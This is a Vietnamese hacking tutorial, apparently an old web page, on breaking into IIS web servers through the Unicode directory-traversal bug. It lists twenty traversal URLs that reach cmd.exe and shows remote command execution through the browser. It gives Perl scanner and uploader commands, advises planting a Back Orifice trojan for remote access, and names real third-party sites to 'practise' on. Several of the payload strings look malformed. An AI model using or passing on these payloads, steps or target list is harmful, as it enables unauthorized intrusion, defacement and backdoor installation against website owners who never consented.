Hack IIS server bằng UNICODE bug :

trang này đã được đọc lần

Giới thiệu :

 Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
 Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách
hack IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !

Hack IIS server bằng UNICODE bug :

 Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server
cũng như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi
UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu
website tất cả đã được patch :)
 Bắt đầu tiến hành :
1. Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các
tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn
đánh : telnet . Rồi chọn

Host: diachitrangweb.com | Port: 80 | Term type: vt100

Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server
không ?

2. Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M)
đownload ở http://www.softseek.com/ ) và file unicode (download ở đây : unicode.pl )
3. Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl www.diachiwebsite.com:80

Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:

[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
 [19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+

4. Ví dụ nó scan ra được bug 15 thì ở URL của Browser bạn gõ :

http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+

Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh
DOS cổ lỗ sĩ thông thường

Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :

http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như
DOS :))

5. Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục:
c:\inetpub\wwwroot

bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ
cứng - đownload ở đây - upload.zip)

cỏ của sổ MS-DOS promt bạn gõ :

perl cgidecoderloader target:80 'f:\inetpub\wwwroot'

Sau khi qua' trình hoàn thành, ở browser bạn đánh :

http://www.diachitrangweb.com/upload.asp rồi upload thứ gì ban muốn (Lời khuyên :

upload 1 trojan backorffice để mở port để sau này ban có thể Remote Access đươc.

6. Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) :
http://www.iwss.net/ http://www.colorworksinc.com/
http://www.ewatchanddiamond.com/ http://www.sintaks.com/ http://www.electroid.com/
http://www.aspcart.com/ http://www.cfaluminum.com/ http://www.thecapitalgroup.cc/
http://www.kristan-sp.si/ http://www.parrotnetwork.com/ http://www.enjoyusa.com/
http://www.activewebsystems.co.uk/ http://www.safeteefirst.com/
http://www.xtendafork.com/ http://vault.kupinet.com/
http://home.socal.rr.com/ .............

o Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack ,
đay là một thủ thuât dơn giản : ban vào trang http://www.av.com/ rồi search với thuât
ngữ sau : "powered by IIS"

Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi :))